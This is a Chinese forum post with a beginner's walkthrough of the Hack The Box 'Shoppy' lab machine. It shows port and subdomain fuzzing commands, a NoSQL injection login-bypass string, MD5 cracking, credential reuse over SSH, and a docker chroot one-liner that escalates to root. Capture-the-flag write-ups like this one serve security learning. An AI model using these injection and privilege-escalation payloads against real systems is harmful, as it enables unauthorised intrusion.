-
-
[原创]HTB Shoppy(easy)
-
发表于: 2022-11-3 17:42
-
题目链接 https://app.hackthebox.com/machines/Shoppy
小白学习web安全 ,借鉴大佬的wp
https://systemweakness.com/shoppy-writeup-hackthebox-98fcd669e075
https://jarrodrizor.com/shoppy-write-up-htb/
1 | sudo vim /etc/hosts |
使用rustscan进行端口扫描
1 | rustscan shoppy.htb -r 1-65535 |
在这里下载词典
http://wordlists.assetnote.io/
https://github.com/danielmiessler/SecLists
根据词典所在的路径扫目录和子域名ffuf kali自带
-u –要扫的网址
-w –要用的词典
-H -使用 HTTP
-fs -过滤掉响应大小为169的结果
1 | ffuf -u http://shoppy.htb/FUZZ -w /home/hml189/Desktop/wordlist/data/manual/2m-subdomains.txt |
1 | ffuf -w /home/hml189/Desktop/wordlist/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://shoppy.htb -H "Host:FUZZ.shoppy.htb" -fs 169 |
发现login和admin,访问发现登陆页面和子域名
进行sql注入尝试,在注入 SQL 时,页面卡住了,猜测是使用得非关系数据库MongoDB,使用noSQL注入
1 | admin’ || ‘1==1 |
在搜索页面继续注入
Kali 上使用 Hash-Identifier 确认是否为md5。
之后解 md5得 remembermethisway
1 | sudo vim /etc/hosts |
mattermost.shoppy.htb是最重要的登录页面。经过谷歌搜索后发现 Mattermost似乎是一款供开发使用的开源协作软件。使用Josh的用户密码登录。
登陆后发现机器的用户密码,使用ssh连接,成功登录
使用sudo -l后看到用户jaeger可以在sudo权限下运行的所有命令
我们可以在没有deploy密码的情况下运行password-manager脚本
1 | sudo -u deploy /home/deploy/password-manager |
让输入密码 ,但是没有
cat /home/deploy/password-manager看看里面有什么
发现密码
现在有了 deploy 的密码,登录看看
发现在docker里,使用 这个帖子里的payload进行权限提升
https://gtfobins.github.io/gtfobins/docker/#shell
1 | docker run -v /:/mnt --rm -it alpine chroot /mnt sh |
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
|
|
|---|---|
